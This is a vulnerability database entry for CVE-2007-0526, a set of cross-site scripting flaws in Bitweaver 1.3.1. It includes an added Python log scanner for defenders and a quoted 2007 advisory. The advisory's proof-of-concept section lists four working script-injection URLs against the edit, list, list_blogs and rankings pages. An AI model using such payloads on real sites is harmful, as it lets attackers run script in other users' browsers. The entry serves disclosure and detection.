Bitweaver Multiple Cross-Site Scripting Vulnerabilities

Vulnerability ID: 1191956
Vulnerability type: Cross-site scripting
Published: 2007-01-25
Updated: 2007-01-25
CVE ID: CVE-2007-0526
CNNVD-ID: CNNVD-200701-455
Platform: N/A
CVSS score: 4.3
|Vulnerability sources
https://www.securityfocus.com/bid/81976
https://cxsecurity.com/issue/WLB-2007010101
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-455
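|Vulnerability details
Bitweaver 1.3.1 contains multiple cross-site scripting vulnerabilities. A remote attacker can inject arbitrary web script or HTML via the URL (PATH_INFO) submitted to (1) articles/edit.php, (2) articles/list.php, (3) blogs/list_blogs.php, or (4) blogs/rankings.php.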
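For defenders reviewing web server logs, the following added example (not part of the original advisory or of Bitweaver) flags requests to the four named scripts whose PATH_INFO carries HTML markup characters after percent-decoding. The combined access-log format, the sample log lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# The four scripts the advisory names for Bitweaver 1.3.1.
AFFECTED_SCRIPTS = ("articles/edit.php", "articles/list.php",
                    "blogs/list_blogs.php", "blogs/rankings.php")
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let PATH_INFO close an HTML attribute or open a tag.
MARKUP_RE = re.compile(r'''[<>"']''')

# Constructed sample log lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Jan/2007:10:00:01 +0000] "GET /articles/list.php?sort=date HTTP/1.1" 200 5120',
    '192.0.2.11 - - [25/Jan/2007:10:00:02 +0000] "GET /blogs/rankings.php/%3E%22%3Cb%3Ex HTTP/1.1" 200 7301',
    '192.0.2.12 - - [25/Jan/2007:10:00:03 +0000] "GET /blogs/list_blogs.php/page/2 HTTP/1.1" 200 6044',
    '192.0.2.13 - - [25/Jan/2007:10:00:04 +0000] "GET /articles/edit.php/%253Cb%253E HTTP/1.1" 200 4410',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup (%253C) is seen too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_info(target):
    """Return the decoded PATH_INFO if it carries markup characters, else None."""
    path = target.split("?", 1)[0]  # the query string is not PATH_INFO
    for script in AFFECTED_SCRIPTS:
        idx = path.find(script + "/")
        if idx != -1:
            path_info = decode_fully(path[idx + len(script):])
            if MARKUP_RE.search(path_info):
                return path_info
    return None

def scan(log_lines):
    """Return (line_number, decoded PATH_INFO) for every flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        found = suspicious_path_info(match.group(1)) if match else None
        if found is not None:
            hits.append((number, found))
    return hits
```

Ordinary PATH_INFO such as `/page/2` and markup that appears only in the query string are deliberately not flagged, since the advisory concerns the path component.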
|Exploit (EXP)
-=[--------------------ADVISORY-------------------]=-
                                              
                        bitweaver 1.3.1     
                                               
  Author: CorryL    [corryl80 (at) gmail (dot) com]
-=[-----------------------------------------------]=-

-=[+] Application:    bitweaver
-=[+] Version:        1.3.1
-=[+] Vendor's URL:   http://www.bitweaver.org/articles/
-=[+] Platform:       Windows Linux Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.x0n3-h4ck.org
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck

..::[ Description ]::..

Bitweaver is an advanced, Open Source, Object Oriented, 
Content Management System (CMS) and Web Application Framework written in PHP. 
It uses Smarty Templates for a simple HTML based templating system and ADOdb 
to support a multitude of databases including MySQL, 
PostgreSQL and Firebird. Its strength lies in its highly modular and easily extensible design. 
This high degree of flexibility is considered "large grained modularity" and gives 
developers freedom to interleave open-source and proprietary code seamlessly. 
bitweaver has been designed from the very beginning, for speed from end-to-end: 
schema design, query utilization, and software design - a highly tuned, performance engine. 
The use of standard compliant XHTML Strict 1.0 and sophisticated tableless 
CSS has made bitweaver stand above the rest in the web application world. The well organized, 
nested style class system gives you substantial freedom with CSS based styling, 
with the least amount of work. With bitweaver, you are in control. 
bitweaver goes out of its way to let you make the decisions and design 
choices that best suit your problem.

..::[ Proof Of Concept ]::..

http://remote-server/articles/edit.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt>
http://remote-server/articles/list.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt>
http://remote-server/blogs/list_blogs.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt>
http://remote-server/blogs/rankings.php/>"><ScRiPt>alert(907810260)%3B</ScRiPt>
|Affected products
Bitweaver Bitweaver 1.3.1
|References

Source: XF
Name: bitweaver-multiple-scripts-xss(31655)
Link: http://xforce.iss.net/xforce/xfdb/31655
Source: BUGTRAQ
Name: 20070122 [x0n3-h4ck] bitweaver 1.3.1 XSS Exploit
Link: http://www.securityfocus.com/archive/1/archive/1/457695/100/0/threaded
Source: OSVDB
Name: 33581
Link: http://osvdb.org/33581
Source: OSVDB
Name: 33580
Link: http://osvdb.org/33580
Source: OSVDB
Name: 33579
Link: http://osvdb.org/33579
Source: OSVDB
Name: 33578
Link: http://osvdb.org/33578
Source: SREASON
Name: 2186
Link: http://securityreason.com/securityalert/2186